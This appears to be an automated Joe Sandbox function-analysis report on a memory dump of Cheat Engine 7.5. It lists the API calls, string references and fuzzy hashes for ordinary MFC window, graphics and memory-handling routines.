Instruction ID: c4f3918d5330fbffa028be961c78dc962af320786786aecd324208f76542f9fc
Opcode Fuzzy Hash: 13fbf060e2a91f090b9f9e8953b55f4ad866a0389c58df321e74464d2044b469
Instruction Fuzzy Hash: 84518C7190062AEBEF04DFB5C891BEDB775BF04748F008529F925A7250EF38A951CBA1

Function 6B4C5B40 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 131COMMON

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 6B4C5B90
std::_Lockit::_Lockit.LIBCPMT ref: 6B4C5BB2
std::_Lockit::~_Lockit.LIBCPMT ref: 6B4C5BD2
__Getctype.LIBCPMT ref: 6B4C5C76
std::_Facet_Register.LIBCPMT ref: 6B4C5C9F
std::_Lockit::~_Lockit.LIBCPMT ref: 6B4C5CB7

Strings

QMLk, xrefs: 6B4C5B7E

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_GetctypeRegister
String ID: QMLk
API String ID: 1102183713-2887455121
Opcode ID: 323ee1db884a7e21acdd2ab8159e2bb2670d41826e79d523f043538704f7a89d
Instruction ID: 5e621a43b361ce1c06c54ab46a59280feb1b744ba199aae8340ff71401c6b79d
Opcode Fuzzy Hash: 323ee1db884a7e21acdd2ab8159e2bb2670d41826e79d523f043538704f7a89d
Instruction Fuzzy Hash: A551DEB5D042148BDB14CF69C582B9EBBB4EB05B14F1441ADD905AB341EB39E901CBE2

Function 6B4E6BF1 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 6B4E6C2C

Part of subcall function 6B4C77D1: UnhookWindowsHookEx.USER32(?), ref: 6B4C77FB

IsWindowEnabled.USER32(00000000), ref: 6B4E6C62
EnableWindow.USER32(00000000,00000000), ref: 6B4E6C7A
EnableWindow.USER32(00000000,00000001), ref: 6B4E6D1B
IsWindow.USER32(00000000), ref: 6B4E6D22
SetFocus.USER32(00000000), ref: 6B4E6D2D

Strings

0#Lk, xrefs: 6B4E6648, 6B4E6686, 6B4E6865, 6B4E68CA, 6B4E6981, 6B4E6A04, 6B4E6A1F, 6B4E6A49, 6B4E6BD4, 6B4E6CD0

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Window$EnableFocus$EnabledHookUnhookWindows
String ID: 0#Lk
API String ID: 2931672367-1841850333
Opcode ID: cd94d8c4aa3e015cc7de9f75c46a4092f7010ee41c1fc1ee043bbd5934bd37be
Instruction ID: 5f548e185d3d974d5394d4ac5bede28effaaa059c5647ec421de81b19347c1db
Opcode Fuzzy Hash: cd94d8c4aa3e015cc7de9f75c46a4092f7010ee41c1fc1ee043bbd5934bd37be
Instruction Fuzzy Hash: 1541CF30700201AFDB44AFB4C989F99B7B5FF45305F0081ADE6198B261CF79E846CBA1

Function 6B4CB8B5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 6B4CB8D6
GetWindow.USER32(?,00000005), ref: 6B4CB8ED
GetWindowRect.USER32(00000000,00000000), ref: 6B4CB911

Part of subcall function 6B4D5C64: ScreenToClient.USER32(?,?), ref: 6B4D5C73
Part of subcall function 6B4D5C64: ScreenToClient.USER32(?,00000000), ref: 6B4D5C80

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000015,00000000), ref: 6B4CB937
GetWindow.USER32(00000000,00000002), ref: 6B4CB940
ScrollWindow.USER32(?,?,?,?,?), ref: 6B4CB95C

Strings

0#Lk, xrefs: 6B4CB97A

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Window$ClientScreen$RectScrollVisible
String ID: 0#Lk
API String ID: 1714389229-1841850333
Opcode ID: b9ed0bf6b55af1ac912983b830acf57393b20233c4acafcf840868d757db1a40
Instruction ID: 83791ba7bbbc60654f845d470b2a69f4b49f6df91fa9e9b9645818b59bbf5917
Opcode Fuzzy Hash: b9ed0bf6b55af1ac912983b830acf57393b20233c4acafcf840868d757db1a40
Instruction Fuzzy Hash: DD316B36A00609AFDF11DF65CC88FAF7BB9FF89B25F108059E901A7250DB78D9008B61

Function 6B4D8F2B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 35libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,?,6B4D127D,?,?,?,?), ref: 6B4D8F3D
GetProcAddress.KERNEL32(00000000,RegisterApplicationRecoveryCallback), ref: 6B4D8F4D
EncodePointer.KERNEL32(00000000,?,?,6B4D127D,?,?,?,?), ref: 6B4D8F56
DecodePointer.KERNEL32(00000000,?,?,6B4D127D,?,?,?,?), ref: 6B4D8F64

Strings

RegisterApplicationRecoveryCallback, xrefs: 6B4D8F47
kernel32.dll, xrefs: 6B4D8F38
0#Lk, xrefs: 6B4D8F7E

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: 0#Lk$RegisterApplicationRecoveryCallback$kernel32.dll
API String ID: 2061474489-2401440456
Opcode ID: 6c03cd3457f2550859e68475669c2765833b87da24cff186d89ef34640a50f74
Instruction ID: cbf3ff72ce344b992cc8df125b0a9d64b3c2ffa3cd361b561e247d4b8fee3c03
Opcode Fuzzy Hash: 6c03cd3457f2550859e68475669c2765833b87da24cff186d89ef34640a50f74
Instruction Fuzzy Hash: D4F0897254522AAFDF213FA6CC18CAA7FBAEF1A7913046155FD15D7320D739C8128BA0

Function 6B4D88C9 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 33libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll), ref: 6B4D88DB
GetProcAddress.KERNEL32(00000000,ChangeWindowMessageFilter), ref: 6B4D88EB
EncodePointer.KERNEL32(00000000), ref: 6B4D88F4
DecodePointer.KERNEL32(00000000), ref: 6B4D8902

Strings

user32.dll, xrefs: 6B4D88D6
ChangeWindowMessageFilter, xrefs: 6B4D88E5
0#Lk, xrefs: 6B4D8916

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: 0#Lk$ChangeWindowMessageFilter$user32.dll
API String ID: 2061474489-175879766
Opcode ID: a31b053647e866e3f8780ac3398a1137d7b9b5af076ecd1c6132d4d108654cdb
Instruction ID: 0bc88c8092c312efafaabecf58325adfa5cbba0fef33ee4bfa24aece6bdeaa26
Opcode Fuzzy Hash: a31b053647e866e3f8780ac3398a1137d7b9b5af076ecd1c6132d4d108654cdb
Instruction Fuzzy Hash: BDF01272545165ABDF213FB68C28FAABBA8EA0669134060A1FC05D2310DB38D8028BE5

Function 6B4D8874 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(uxtheme.dll,?,6B4FC642,?,?,6B4FC28B,A934EE1E,?,?,?,Function_0016966C,000000FF), ref: 6B4D8883
GetProcAddress.KERNEL32(00000000,BufferedPaintUnInit), ref: 6B4D8893
EncodePointer.KERNEL32(00000000,?,6B4FC642,?,?,6B4FC28B,A934EE1E,?,?,?,Function_0016966C,000000FF), ref: 6B4D889C
DecodePointer.KERNEL32(00000000,?,6B4FC642,?,?,6B4FC28B,A934EE1E,?,?,?,Function_0016966C,000000FF), ref: 6B4D88AA

Strings

uxtheme.dll, xrefs: 6B4D887E
BufferedPaintUnInit, xrefs: 6B4D888D
0#Lk, xrefs: 6B4D88B8

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeHandleModuleProc
String ID: 0#Lk$BufferedPaintUnInit$uxtheme.dll
API String ID: 2061474489-2281920405
Opcode ID: 293c5c873c5c82df37e53edd7b42cc82a65f6c21b82edde0c3a090713fc9c46c
Instruction ID: e5dc423175346617749f333aa87c084d1ea06c57c99804e430da373dfc94114f
Opcode Fuzzy Hash: 293c5c873c5c82df37e53edd7b42cc82a65f6c21b82edde0c3a090713fc9c46c
Instruction Fuzzy Hash: 14E06576B115329BEF207B7598188AA77E8AF426423067061FC12D7354DB38CC4247A0

Function 6B502933 Relevance: 12.1, APIs: 8, Instructions: 133windowCOMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6B50293A
EnterCriticalSection.KERNEL32(6B694B00,00000018,6B52DA81,?,?,?,00000000,?,?,?,?,?,00000000), ref: 6B50295D
SelectObject.GDI32(?,00000018), ref: 6B5029AC
LeaveCriticalSection.KERNEL32(6B694B00,?,?,00000000), ref: 6B5029C9
CreateBitmap.GDI32(?,-00000002,00000001,00000001,00000000), ref: 6B5029F1
SelectObject.GDI32(00000000), ref: 6B502A00
CreateCompatibleDC.GDI32(00000000), ref: 6B502A7E
CreateCompatibleBitmap.GDI32(?,?,-00000002), ref: 6B502A9E

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Create$BitmapCompatibleCriticalObjectSectionSelect$EnterH_prolog3Leave
String ID:
API String ID: 4255533662-0
Opcode ID: f0df906509d96f83557113beddbbf362458cef5e952867f5bb64bb2c0d4df263
Instruction ID: 1d7fbcf84e8b7b4a00c12d7f21197a0b8582703a0e4778d19c2e952dabd82e7f
Opcode Fuzzy Hash: f0df906509d96f83557113beddbbf362458cef5e952867f5bb64bb2c0d4df263
Instruction Fuzzy Hash: 56517A70600B01DBEB34DF66C950BABB7F4FF05314B00496DE96686650DFBAE880CB20

Function 6B4D3AFA Relevance: 12.1, APIs: 8, Instructions: 100memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 6B4D3B01
EnterCriticalSection.KERNEL32(6B4C37F5,00000010,6B4D3A28,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3B12
TlsGetValue.KERNEL32(?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3B2E
LocalAlloc.KERNEL32(00000000,00000000,00000010,?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3B96
LocalReAlloc.KERNEL32(?,00000000,00000002,00000010,?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3BAB
TlsSetValue.KERNEL32(?,00000000,6B4C37F5), ref: 6B4D3BDC
LeaveCriticalSection.KERNEL32(?,?,00000000,?,?,?,?,?,?,6B4C37F5), ref: 6B4D3BFA

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: AllocCriticalLocalSectionValue$EnterH_prolog3_catchLeave
String ID:
API String ID: 1707010094-0
Opcode ID: 861415d54e2cd2adcc197fef3e543a8fdce37f194be65747d7ee39f74f7a39af
Instruction ID: 63dca0002a8f5eeece4beba3dcd1bbe4ea7d8e834d408ffcc7866be99e166dc2
Opcode Fuzzy Hash: 861415d54e2cd2adcc197fef3e543a8fdce37f194be65747d7ee39f74f7a39af
Instruction Fuzzy Hash: 1B31E3719007019FDB359F6AC896F5B7BB1EF84720B10856EE8159B362CB39E900CF91

Function 6B4D986F Relevance: 12.1, APIs: 8, Instructions: 77COMMON

Download Yara Rule

APIs

RealChildWindowFromPoint.USER32(?,?,?), ref: 6B4D9893
ClientToScreen.USER32(?,?), ref: 6B4D98AE
GetWindow.USER32(?,00000005), ref: 6B4D98B7
GetDlgCtrlID.USER32(00000000), ref: 6B4D98C7
GetWindowLongW.USER32(00000000,000000F0), ref: 6B4D98D7
GetWindowRect.USER32(00000000,?), ref: 6B4D98F5
PtInRect.USER32(?,?,?), ref: 6B4D9905
GetWindow.USER32(00000000,00000002), ref: 6B4D9914

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Window$Rect$ChildClientCtrlFromLongPointRealScreen
String ID:
API String ID: 151369081-0
Opcode ID: e903c22e2525a49562de3c6666ddc0141f47523e74d2b35b1e6a16d3d42965d3
Instruction ID: 78d3dd15a730a163217fc5ca3b5f671eb4a57494007a34d6de74c1aa4099a245
Opcode Fuzzy Hash: e903c22e2525a49562de3c6666ddc0141f47523e74d2b35b1e6a16d3d42965d3
Instruction Fuzzy Hash: BF21957190161AABCF119FA9CC59EEF7BB8EF0A710F104169F411E3350D738DA418BA0

Function 6B4D0A80 Relevance: 12.1, APIs: 8, Instructions: 60memorystringCOMMON

Download Yara Rule

APIs

GlobalLock.KERNEL32(00000000), ref: 6B4D0A94
lstrcmpW.KERNEL32(00000000,?), ref: 6B4D0AA5
OpenPrinterW.WINSPOOL.DRV(?,?,00000000), ref: 6B4D0ABA
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6B4D0ADA
GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 6B4D0AE2
GlobalLock.KERNEL32(00000000), ref: 6B4D0AEC
DocumentPropertiesW.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 6B4D0AFD
ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 6B4D0B15

Part of subcall function 6B4D95A1: GlobalFlags.KERNEL32(?), ref: 6B4D95AE
Part of subcall function 6B4D95A1: GlobalUnlock.KERNEL32(?), ref: 6B4D95BC
Part of subcall function 6B4D95A1: GlobalFree.KERNEL32(?), ref: 6B4D95C8

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
String ID:
API String ID: 168474834-0
Opcode ID: 770dde39e80e19e4d18af74d4a84b7c7081561061643fcbb1b239898a95da099
Instruction ID: de2bdc6d8ae4ef013c92b8b88de6ede0c8c18b24df2dc36890d48d82008c5223
Opcode Fuzzy Hash: 770dde39e80e19e4d18af74d4a84b7c7081561061643fcbb1b239898a95da099
Instruction Fuzzy Hash: 3F118CB1404608BFEF125FB1CDA5EAA7BEDEF00748B000469F61191231DB39DA50EB20

Function 6B4CEA4C Relevance: 12.0, APIs: 8, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GlobalSize.KERNEL32(?), ref: 6B4CEA55
GlobalAlloc.KERNEL32(00002002,00000000), ref: 6B4CEA6D
GlobalLock.KERNEL32(?), ref: 6B4CEA7D
GlobalLock.KERNEL32(?), ref: 6B4CEA86
GlobalSize.KERNEL32(?), ref: 6B4CEA93

Part of subcall function 6B4CEE53: _memcpy_s.LIBCMT ref: 6B4CEE62

GlobalUnlock.KERNEL32(?), ref: 6B4CEAA4
GlobalUnlock.KERNEL32(?), ref: 6B4CEAAD
GlobalSize.KERNEL32(?), ref: 6B4CEABD

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: Global$Size$LockUnlock$Alloc_memcpy_s
String ID:
API String ID: 3833998449-0
Opcode ID: 475e3f91a1e202869379a4af85ba3581d6fe31dd0390359931d7c055fb8874f0
Instruction ID: 5d1439e931b808f8e9840927be9a2f3e98e1a3a8a54a636d2792a439a0b405bf
Opcode Fuzzy Hash: 475e3f91a1e202869379a4af85ba3581d6fe31dd0390359931d7c055fb8874f0
Instruction Fuzzy Hash: 1A012C76540214BFEF217BE68C8DC9B7EACEF46AA17005024F909D2321D739D9008761

Function 6B61A891 Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE

Download Yara Rule

APIs

_strrchr.LIBCMT ref: 6B61A917

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: _strrchr
String ID:
API String ID: 3213747228-0
Opcode ID: 716d64431459630ae1e75006e040eb2c1dd6adb019f08989e039c79630bedc66
Instruction ID: 5d4c1d7e10ea19dc4fd473bdd4ce1683cd8ff7206611ddb5b301e14090c104bc
Opcode Fuzzy Hash: 716d64431459630ae1e75006e040eb2c1dd6adb019f08989e039c79630bedc66
Instruction Fuzzy Hash: 5DB15BB2D093959FDB058F6CCC81BEE7BB6EF45310F148195E524AB281D37C9949CBA0

Function 6B4F1801 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000120C,00000000,00000002), ref: 6B4F1884
SendMessageW.USER32(?,0000120C,00000001,00000002), ref: 6B4F18B9
RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 6B4F18DF
GetCapture.USER32 ref: 6B4F196E
ReleaseCapture.USER32 ref: 6B4F1978

Strings

0#Lk, xrefs: 6B4F1832, 6B4F186B, 6B4F18A5, 6B4F18C9, 6B4F191F, 6B4F193A, 6B4F1959

Memory Dump Source

Source File: 00000008.00000002.3448503678.000000006B4C1000.00000020.00000001.01000000.00000013.sdmp, Offset: 6B4C0000, based on PE: true

Associated: 00000008.00000002.3448462024.000000006B4C0000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3457392843.000000006B638000.00000002.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459542671.000000006B68D000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459603967.000000006B68F000.00000008.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459696728.000000006B692000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459742082.000000006B694000.00000004.00000001.01000000.00000013.sdmpDownload File
Associated: 00000008.00000002.3459833250.000000006B698000.00000002.00000001.01000000.00000013.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_6b4c0000_CheatEngine75.jbxd

Similarity

API ID: CaptureMessageSend$RedrawReleaseWindow
String ID: 0#Lk
API String ID: 2167886739-1841850333
Opcode ID: 8190b4da4d14cd16de27596d90941c1c4d1de118ffe90abac23e0283894ea415
Instruction ID: 42eff08e1186bd0f843bc8e329941d277b1ccf2d436946dc68f61ab2039e55b9
Opcode Fuzzy Hash: 8190b4da4d14cd16de27596d90941c1c4d1de118ffe90abac23e0283894ea415
Instruction Fuzzy Hash: 2B41AF757002219FDF09AF65C894FAD77B9FF88760F0400A9E906E7390DB74A942CBA1

Function 6B4FE8FF Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 140windowCOMMON

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 6B4FE906

Part of subcall function 6B4D4BD7: __EH_prolog3.LIBCMT ref: 6B4D4BDE
Part of subcall function 6B4D4BD7: GetWindowDC.USER32(00000000,00000004,6B4FD606,00000000), ref: 6B4D4C0A

CreateCompatibleDC.GDI32(00000000), ref: 6B4FE93E
CreateDIBSection.GDI32(?,00000028,00000000,?,00000000,00000000), ref: 6B4FE9C7
CreateCompatibleBitmap.GDI32(?,00000000,?), ref: 6B4FE9E1

Part of subcall function 6B4D5D43: SelectObject.GDI32(?,6B530896), ref: 6B4D5D4C

FillRect.USER32(?,00000000,-00000098), ref: 6B4FEA2C

Strings

(, xrefs: 6B4FE998
